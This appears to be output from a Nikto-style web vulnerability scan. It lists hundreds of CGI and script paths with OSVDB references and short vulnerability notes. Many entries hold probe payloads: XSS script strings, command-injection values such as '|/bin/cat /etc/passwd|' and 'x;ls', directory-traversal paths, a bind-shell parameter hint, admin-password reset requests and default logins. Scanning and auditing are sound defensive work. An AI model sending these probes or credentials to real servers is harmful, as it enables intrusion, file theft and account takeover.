+ OSVDB-21366: /cgi-bin-sdb/diagnose.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4598: /members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2754: /guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E: MPM Guestbook 1.2 and previous are vulnreable to XSS attacks.
+ OSVDB-2946: /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-19772: /cgi-915/title.cgi: HNS's title.cgi is vulnerable to Cross Site Scripting (XSS http://www.cert.org/advisories/CA-2000-02.html) in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-19772: /cgi-win/title.cgi: HNS's title.cgi is vulnerable to Cross Site Scripting (XSS http://www.cert.org/advisories/CA-2000-02.html) in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-19772: /fcgi-bin/title.cgi: HNS's title.cgi is vulnerable to Cross Site Scripting (XSS http://www.cert.org/advisories/CA-2000-02.html) in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-19772: /cgi-exe/title.cgi: HNS's title.cgi is vulnerable to Cross Site Scripting (XSS http://www.cert.org/advisories/CA-2000-02.html) in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-19772: /cgi-perl/title.cgi: HNS's title.cgi is vulnerable to Cross Site Scripting (XSS http://www.cert.org/advisories/CA-2000-02.html) in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-21365: /cgi-915/compatible.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21365: /htbin/compatible.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21365: /scripts/compatible.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21365: /cgi-exe/compatible.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /cgibin/probecontrol.cgi?command=enable&userNikto=cancer&password=killer: This might be interesting... has been seen in web logs from a scanner.
+ /cgi-exe/probecontrol.cgi?command=enable&userNikto=cancer&password=killer: This might be interesting... has been seen in web logs from a scanner.
+ /cgi-perl/probecontrol.cgi?command=enable&userNikto=cancer&password=killer: This might be interesting... has been seen in web logs from a scanner.
+ /cgi-bin-sdb/probecontrol.cgi?command=enable&userNikto=cancer&password=killer: This might be interesting... has been seen in web logs from a scanner.
+ /fcgi-bin/wwwadmin.pl: Administration CGI?
+ /cgi/webmap.cgi: nmap front end... could be fun
+ /cgi-bin/webmap.cgi: nmap front end... could be fun
+ /cgibin/webmap.cgi: nmap front end... could be fun
+ /cgis/webmap.cgi: nmap front end... could be fun
+ /fcgi-bin/webmap.cgi: nmap front end... could be fun
+ /cbms/changepass.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /webcgi/admin/admin.cgi: May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio.
+ /cgi-915/admin/admin.cgi: May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio.
+ /fcgi-bin/admin/admin.cgi: May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio.
+ /cgi/admin/setup.cgi: May be ImageFolio Pro setup CGI. Default login is Admin/ImageFolio.
+ /cgibin/admin/setup.cgi: May be ImageFolio Pro setup CGI. Default login is Admin/ImageFolio.
+ /cgi-win/mt-static/mt-load.cgi: Movable Type weblog installation CGI found. May be able to reconfigure or reload.
+ /cgi-exe/mt/mt-load.cgi: Movable Type weblog installation CGI found. May be able to reconfigure or reload.
+ /cgi/dbman/db.cgi?db=no-db: This CGI allows remote attackers to view system information.
+ /htbin/dbman/db.cgi?db=no-db: This CGI allows remote attackers to view system information.
+ /cgi-perl/dbman/db.cgi?db=no-db: This CGI allows remote attackers to view system information.
+ OSVDB-17111: /cgi-exe/dcshop/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ OSVDB-17111: /cgi-915/DCShop/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ OSVDB-17111: /cgi-bin-sdb/DCShop/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ OSVDB-596: /cgi-perl/dcshop/orders/orders.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ /cgibin/dumpenv.pl: This CGI gives a lot of information to attackers.
+ /cgi-bin-sdb/dumpenv.pl: This CGI gives a lot of information to attackers.
+ /webcgi/mkilog.exe: This CGI can give an attacker a lot of information.
+ /cgi-bin/mkilog.exe: This CGI can give an attacker a lot of information.
+ /htbin/mkilog.exe: This CGI can give an attacker a lot of information.
+ /fcgi-bin/mkilog.exe: This CGI can give an attacker a lot of information.
+ /cgi-perl/mkilog.exe: This CGI can give an attacker a lot of information.
+ /webcgi/mkplog.exe: This CGI can give an attacker a lot of information.
+ /cgi/mkplog.exe: This CGI can give an attacker a lot of information.
+ /cgi-bin/mkplog.exe: This CGI can give an attacker a lot of information.
+ /htbin/mkplog.exe: This CGI can give an attacker a lot of information.
+ /cgibin/mkplog.exe: This CGI can give an attacker a lot of information.
+ /scripts/mkplog.exe: This CGI can give an attacker a lot of information.
+ /cgi-bin-sdb/mkplog.exe: This CGI can give an attacker a lot of information.
+ /htbin/processit.pl: This CGI returns environment variables, giving attackers valuable information.
+ /cgibin/processit.pl: This CGI returns environment variables, giving attackers valuable information.
+ /cgis/processit.pl: This CGI returns environment variables, giving attackers valuable information.
+ /cgi-exe/processit.pl: This CGI returns environment variables, giving attackers valuable information.
+ /webcgi/rpm_query: This CGI allows anyone to see the installed RPMs
+ /cgi-915/rpm_query: This CGI allows anyone to see the installed RPMs
+ /cgi/rpm_query: This CGI allows anyone to see the installed RPMs
+ /htbin/rpm_query: This CGI allows anyone to see the installed RPMs
+ /cgis/rpm_query: This CGI allows anyone to see the installed RPMs
+ /webcgi/ws_ftp.ini: Can contain saved passwords for ftp sites
+ /cgi/ws_ftp.ini: Can contain saved passwords for ftp sites
+ /cgi-bin-sdb/ws_ftp.ini: Can contain saved passwords for ftp sites
+ /scripts/WS_FTP.ini: Can contain saved passwords for ftp sites
+ /cgi-win/WS_FTP.ini: Can contain saved passwords for ftp sites
+ /fcgi-bin/WS_FTP.ini: Can contain saved passwords for ftp sites
+ /cgi-perl/WS_FTP.ini: Can contain saved passwords for ftp sites
+ /cgi-bin/MachineInfo: Gives out information on the machine (IRIX), including hostname
+ /cplogfile.log: XMB Magic Lantern forum 1.6b final (http://www.xmbforum.com) log file is readable remotely. Upgrade to the latest version.
+ /webcgi/view-source?view-source: This allows remote users to view source code.
+ /htbin/view-source?view-source: This allows remote users to view source code.
+ /scripts/view-source?view-source: This allows remote users to view source code.
+ /cgi-win/view-source?view-source: This allows remote users to view source code.
+ OSVDB-9332: /webcgi/scoadminreg.cgi: This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web.
+ OSVDB-9332: /cgis/scoadminreg.cgi: This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web.
+ OSVDB-9332: /cgi-perl/scoadminreg.cgi: This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web.
+ OSVDB-9332: /cgi-bin-sdb/scoadminreg.cgi: This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web.
+ OSVDB-4663: /cgi-bin/SGB_DIR/superguestconfig: Super GuestBook 1.0 from lasource.r2.ru stores the admin password in a plain text file.
+ /cgi-exe/icat: Multiple versions of icat allow attackers to read arbitrary files. Make sure the latest version is running.
+ /cgi-bin-sdb/icat: Multiple versions of icat allow attackers to read arbitrary files. Make sure the latest version is running.
+ /cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0: nCUBE Server Manager 1.0 nph-showlogs.pl directory traversal bug
+ /scripts/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0: nCUBE Server Manager 1.0 nph-showlogs.pl directory traversal bug
+ /fcgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0: nCUBE Server Manager 1.0 nph-showlogs.pl directory traversal bug
+ /cgibin/view-source: This may allow remote arbitrary file retrieval.
+ /cgis/view-source: This may allow remote arbitrary file retrieval.
+ /cgi-win/view-source: This may allow remote arbitrary file retrieval.
+ /cgi-exe/view-source: This may allow remote arbitrary file retrieval.
+ /cgi-bin-sdb/view-source: This may allow remote arbitrary file retrieval.
+ /cgi-915/wrap: This CGI lets users read any file with 755 perms. It should not be in the CGI directory.
+ /cgibin/wrap: This CGI lets users read any file with 755 perms. It should not be in the CGI directory.
+ /cgis/wrap: This CGI lets users read any file with 755 perms. It should not be in the CGI directory.
+ /fcgi-bin/wrap: This CGI lets users read any file with 755 perms. It should not be in the CGI directory.
+ /webcgi/cgiwrap: Some versions of cgiwrap allow anyone to execute commands remotely.
+ /cgi-bin-sdb/cgiwrap: Some versions of cgiwrap allow anyone to execute commands remotely.
+ /cgi/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ /htbin/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ /fcgi-bin/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ /cgi-exe/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ OSVDB-4571: /cgi-win/ImageFolio/admin/admin.cgi: ImageFolio (default accout Admin/ImageFolio) may allow files to be deleted via URLs like: ?cgi=remove.pl&uid=111.111.111.111&rmstep=2&category=../../../../../../../../../../../etc/
+ /webcgi/info2www: This CGI allows attackers to execute commands.
+ /htbin/info2www: This CGI allows attackers to execute commands.
+ /cgi-exe/info2www: This CGI allows attackers to execute commands.
+ /cgi-perl/info2www: This CGI allows attackers to execute commands.
+ /cgi-bin-sdb/info2www: This CGI allows attackers to execute commands.
+ /cgi-bin/infosrch.cgi: This CGI allows attackers to execute commands.
+ /cgis/infosrch.cgi: This CGI allows attackers to execute commands.
+ /cgi-win/infosrch.cgi: This CGI allows attackers to execute commands.
+ /cgi-bin/listrec.pl: This CGI allows attackers to execute commands on the host.
+ /htbin/listrec.pl: This CGI allows attackers to execute commands on the host.
+ /fcgi-bin/listrec.pl: This CGI allows attackers to execute commands on the host.
+ /cgi-exe/listrec.pl: This CGI allows attackers to execute commands on the host.
+ /htbin/mailnews.cgi: Some versions allow attacker to execute commands as http daemon. Upgrade or remove.
+ /cgi-exe/mailnews.cgi: Some versions allow attacker to execute commands as http daemon. Upgrade or remove.
+ /cgi-bin-sdb/mailnews.cgi: Some versions allow attacker to execute commands as http daemon. Upgrade or remove.
+ /cgi/mmstdod.cgi: May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher.
+ /cgi-bin/mmstdod.cgi: May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher.
+ /scripts/mmstdod.cgi: May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher.
+ /fcgi-bin/mmstdod.cgi: May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher.
+ /cgi-915/pagelog.cgi: Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try.
+ /cgibin/pagelog.cgi: Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try.
+ /cgi-perl/pagelog.cgi: Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try.
+ /cgi-bin-sdb/pagelog.cgi: Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try.
+ /cgi/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi-win/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /fcgi-bin/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi-bin-sdb/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi-915/perl.exe?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.
+ /htbin/perl.exe?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.
+ /cgi-win/perl.exe?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.
+ /fcgi-bin/perl.exe?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.
+ /cgi-bin-sdb/perl.exe?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.
+ /cgibin/perl.exe: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /scripts/perl.exe: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi-bin-sdb/perl.exe: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /htbin/perl: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgibin/perl: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgis/perl: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /scripts/perl: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi-bin-sdb/perl: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi/plusmail: This CGI may allow attackers to execute commands remotely.
+ /cgibin/plusmail: This CGI may allow attackers to execute commands remotely.
+ /cgi-win/plusmail: This CGI may allow attackers to execute commands remotely.
+ /cgi-bin-sdb/plusmail: This CGI may allow attackers to execute commands remotely.
+ OSVDB-10944: /htbin/scripts/slxweb.dll/getfile?type=Library&file=[invalid fileNikto]: SalesLogix WebClient may allow attackers to execute arbitrary commands on the host.
+ OSVDB-10944: /cgi-win/scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]: SalesLogix WebClient may allow attackers to execute arbitrary commands on the host.
+ /scripts/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|: To check for remote execution vulnerability use ?keywords=|/bin/ls| or your favorite command
+ OSVDB-54034: /htbin/spin_client.cgi?aaaaaaaa: This CGI may be vulnerable to remote execution by sending 8000 x 'a' characters (check to see if you get a 500 error message)
+ OSVDB-54034: /fcgi-bin/spin_client.cgi?aaaaaaaa: This CGI may be vulnerable to remote execution by sending 8000 x 'a' characters (check to see if you get a 500 error message)
+ OSVDB-54034: /cgi-perl/spin_client.cgi?aaaaaaaa: This CGI may be vulnerable to remote execution by sending 8000 x 'a' characters (check to see if you get a 500 error message)
+ OSVDB-10598: /webcgi/sscd_suncourier.pl: Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.
+ OSVDB-10598: /cgi-perl/sscd_suncourier.pl: Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.
+ OSVDB-10598: /cgi-bin-sdb/sscd_suncourier.pl: Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.
+ OSVDB-13981: /cgibin/viralator.cgi: May be vulnerable to command injection, upgrade to 0.9pre2 or newer. This flaw could not be confirmed.
+ OSVDB-13981: /cgis/viralator.cgi: May be vulnerable to command injection, upgrade to 0.9pre2 or newer. This flaw could not be confirmed.
+ OSVDB-13981: /cgi-perl/viralator.cgi: May be vulnerable to command injection, upgrade to 0.9pre2 or newer. This flaw could not be confirmed.
+ OSVDB-4854: /webcgi/virgil.cgi: The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.
+ OSVDB-4854: /cgi-bin/virgil.cgi: The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.
+ OSVDB-4854: /cgibin/virgil.cgi: The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.
+ OSVDB-4854: /scripts/virgil.cgi: The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.
+ OSVDB-4854: /fcgi-bin/virgil.cgi: The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.
+ OSVDB-2088: /cgi-915/vpasswd.cgi: Some versions of this CGI allow attackers to execute commands on your system. Verify this is the latest version available.
+ OSVDB-2088: /cgi-bin/vpasswd.cgi: Some versions of this CGI allow attackers to execute commands on your system. Verify this is the latest version available.
+ OSVDB-2088: /cgis/vpasswd.cgi: Some versions of this CGI allow attackers to execute commands on your system. Verify this is the latest version available.
+ OSVDB-2088: /scripts/vpasswd.cgi: Some versions of this CGI allow attackers to execute commands on your system. Verify this is the latest version available.
+ OSVDB-236: /cgi-915/webgais: The webgais allows attackers to execute commands.
+ OSVDB-236: /cgi/webgais: The webgais allows attackers to execute commands.
+ OSVDB-236: /htbin/webgais: The webgais allows attackers to execute commands.
+ OSVDB-236: /cgis/webgais: The webgais allows attackers to execute commands.
+ OSVDB-236: /cgi-win/webgais: The webgais allows attackers to execute commands.
+ OSVDB-237: /cgi/websendmail: This CGI may allow attackers to execute arbitrary commands remotely.
+ OSVDB-237: /htbin/websendmail: This CGI may allow attackers to execute arbitrary commands remotely.
+ OSVDB-237: /cgi-win/websendmail: This CGI may allow attackers to execute arbitrary commands remotely.
+ /webcgi/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /cgi/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /cgi-bin/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /cgi-win/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /fcgi-bin/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /cgi-perl/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /cgi/common/listrec.pl: This CGI allows attackers to execute commands on the host.
+ /cgi-win/common/listrec.pl: This CGI allows attackers to execute commands on the host.
+ OSVDB-59031: /webcgi/stat.pl: Uninets StatsPlus 1.25 from http://www.uninetsolutions.com/stats.html may be vulnerable to command/script injection by manipulating HTTP_USER_AGENT or HTTP_REFERER.
+ OSVDB-28: /cgi-915/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-28: /cgi-bin/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-28: /cgibin/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-28: /scripts/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-28: /fcgi-bin/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-28: /cgi-bin-sdb/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-142: /webcgi/ppdscgi.exe: PowerPlay Web Edition may allow unauthenticated users to view pages.
+ OSVDB-142: /htbin/ppdscgi.exe: PowerPlay Web Edition may allow unauthenticated users to view pages.
+ OSVDB-142: /cgis/ppdscgi.exe: PowerPlay Web Edition may allow unauthenticated users to view pages.
+ OSVDB-142: /scripts/ppdscgi.exe: PowerPlay Web Edition may allow unauthenticated users to view pages.
+ /cgi-bin/webif.cgi: HNS's webif.cgi is vulnerable to allow remote users to rewrite diary entries if 'direct mode' is enabled in version 2.00 and earlier, and Lite 0.8 and earlier.
+ /scripts/webif.cgi: HNS's webif.cgi is vulnerable to allow remote users to rewrite diary entries if 'direct mode' is enabled in version 2.00 and earlier, and Lite 0.8 and earlier.
+ /fcgi-bin/webif.cgi: HNS's webif.cgi is vulnerable to allow remote users to rewrite diary entries if 'direct mode' is enabled in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ /admin.php4?reg_login=1: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
+ /cgibin/webdriver: This CGI often allows anyone to access the Informix DB on the host.
+ /cgi-exe/webdriver: This CGI often allows anyone to access the Informix DB on the host.
+ /cgi-perl/webdriver: This CGI often allows anyone to access the Informix DB on the host.
+ /cgi-win/c32web.exe/ChangeAdminPassword: This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password.
+ /cgi/cgi-lib.pl: CGI Library. If retrieved check to see if it is outdated, it may have vulns
+ /cgi-bin/cgi-lib.pl: CGI Library. If retrieved check to see if it is outdated, it may have vulns
+ /htbin/cgi-lib.pl: CGI Library. If retrieved check to see if it is outdated, it may have vulns
+ /cgis/cgi-lib.pl: CGI Library. If retrieved check to see if it is outdated, it may have vulns
+ /cgi-exe/cgi-lib.pl: CGI Library. If retrieved check to see if it is outdated, it may have vulns
+ /fcgi-bin/log/nether-log.pl?checkit: Default Pass: nethernet-rules
+ /webcgi/mini_logger.cgi: Default password: guest
+ /cgi-915/mini_logger.cgi: Default password: guest
+ /scripts/mini_logger.cgi: Default password: guest
+ /fcgi-bin/mini_logger.cgi: Default password: guest
+ /cgi-bin-sdb/mini_logger.cgi: Default password: guest
+ /cgi-bin/nimages.php: Alpha versions of the Nimages package vulnerable to non-specific 'major' security bugs.
+ /cgis/nimages.php: Alpha versions of the Nimages package vulnerable to non-specific 'major' security bugs.
+ /cgi-exe/nimages.php: Alpha versions of the Nimages package vulnerable to non-specific 'major' security bugs.
+ /scripts/robadmin.cgi: Default password: roblog
+ /cgi-exe/robadmin.cgi: Default password: roblog
+ /htbin/netpad.cgi: netpad.cgi may be an indication of a malicious user on the system, as it allows web access to the file system. It may also have remote vulnerabilities itself. This should be removed or protected.
+ /scripts/netpad.cgi: netpad.cgi may be an indication of a malicious user on the system, as it allows web access to the file system. It may also have remote vulnerabilities itself. This should be removed or protected.
+ /cgi-exe/netpad.cgi: netpad.cgi may be an indication of a malicious user on the system, as it allows web access to the file system. It may also have remote vulnerabilities itself. This should be removed or protected.
+ /cgi/troops.cgi: This CGI may be a leftover from a hacked site; may be used to attempt to hack other sites.  It should be investigated further.
+ /cgis/troops.cgi: This CGI may be a leftover from a hacked site; may be used to attempt to hack other sites.  It should be investigated further.
+ /cgi-bin-sdb/troops.cgi: This CGI may be a leftover from a hacked site; may be used to attempt to hack other sites.  It should be investigated further.
+ /cgi-bin/unlg1.1: web backdoor by ULG
+ /cgis/unlg1.1: web backdoor by ULG
+ /cgi-win/unlg1.1: web backdoor by ULG
+ /cgi-perl/unlg1.1: web backdoor by ULG
+ /webcgi/unlg1.2: web backdoor by ULG
+ /cgi-915/unlg1.2: web backdoor by ULG
+ /cgis/unlg1.2: web backdoor by ULG
+ /cgi-exe/unlg1.2: web backdoor by ULG
+ /cgi-bin-sdb/unlg1.2: web backdoor by ULG
+ /cgi/rwwwshell.pl: THC reverse www shell
+ /cgi-bin/rwwwshell.pl: THC reverse www shell
+ /cgis/rwwwshell.pl: THC reverse www shell
+ /cgi-win/rwwwshell.pl: THC reverse www shell
+ /webcgi/photo/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more.
+ /cgibin/photo/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more.
+ OSVDB-35876: /agentadmin.php: Immobilier agentadmin.php contains multiple SQL injection vulnerabilities.
+ /servlet/SessionManager: IBM WebSphere reconfigure servlet (user=servlet, password=manager). All default code should be removed from servers.
+ /ip.txt: This may be User Online from http://www.elpar.net version 2.0, which has a remotely accessible log file.
+ OSVDB-59536: /logicworks.ini: web-erp 0.1.4 and earlier allow .ini files to be read remotely.
+ OSVDB-2881: /pp.php?action=login: Pieterpost 0.10.6 allows anyone to access the 'virtual' account which can be used to relay/send e-mail.
+ /isapi/count.pl?: AN HTTPd default script may allow writing over arbitrary files with a new content of '1', which could allow a trivial DoS. Append /../../../../../ctr.dll to replace this file's contents, for example.
+ OSVDB-113: /ncl_items.html: This may allow attackers to reconfigure your Tektronix printer.
+ /pvote/ch_info.php?newpass=password&confirm=password%20: PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password.
+ OSVDB-3126: /submit?setoption=q&option=allowed_ips&value=255.255.255.255: MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.
+ OSVDB-2225: /thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin: paBox 1.6 may allow remote users to set the admin password. If successful, the 'admin' password is now 'admin'.
+ OSVDB-3092: /shopadmin.asp: VP-ASP shopping cart admin may be available via the web. Default ID/PW are vpasp/vpasp and admin/admin.
+ OSVDB-473: /_vti_pvt/service.cnf: Contains meta-information about the web server Remove or ACL if FrontPage is not being used.
+ OSVDB-568: /blahb.ida: Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. http://www.microsoft.com/technet/security/bulletin/MS01-033.asp.
+ OSVDB-578: /level/24/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/38/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/63/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/71/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-13405: /WS_FTP.LOG: WS_FTP.LOG file was found. It may contain sensitive information.
+ OSVDB-3093: /cgi-915/ccbill-local.pl?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cgi/ccbill-local.pl?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /scripts/ccbill-local.pl?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cgi-win/ccbill-local.pl?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /webcgi/ccbill-local.cgi?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cgi-bin/ccbill-local.cgi?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /scripts/ccbill-local.cgi?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-1642: /cgi-win/gbook/gbook.cgi?_MAILTO=xx;ls: gbook.cgi allows command execution.
+ OSVDB-7161: /scripts/bslist.cgi?email=x;ls: BSList allows command execution.
+ OSVDB-7161: /cgi-perl/bslist.cgi?email=x;ls: BSList allows command execution.
+ OSVDB-7162: /webcgi/bsguest.cgi?email=x;ls: BSGuest allows command execution.
+ OSVDB-7162: /cgi-915/bsguest.cgi?email=x;ls: BSGuest allows command execution.
+ OSVDB-7162: /cgi/bsguest.cgi?email=x;ls: BSGuest allows command execution.
+ OSVDB-7162: /cgi-bin-sdb/bsguest.cgi?email=x;ls: BSGuest allows command execution.
+ OSVDB-136: /cgi/phf: This allows attackers to read arbitrary files on the system and perhaps execute commands.
+ OSVDB-136: /cgi-win/phf: This allows attackers to read arbitrary files on the system and perhaps execute commands.
+ OSVDB-136: /fcgi-bin/phf: This allows attackers to read arbitrary files on the system and perhaps execute commands.
+ OSVDB-136: /cgi-perl/phf: This allows attackers to read arbitrary files on the system and perhaps execute commands.
+ OSVDB-136: /cgi-bin-sdb/phf: This allows attackers to read arbitrary files on the system and perhaps execute commands.
+ OSVDB-228: /cgi/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-228: /cgi-bin/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-228: /cgi-win/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-228: /fcgi-bin/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
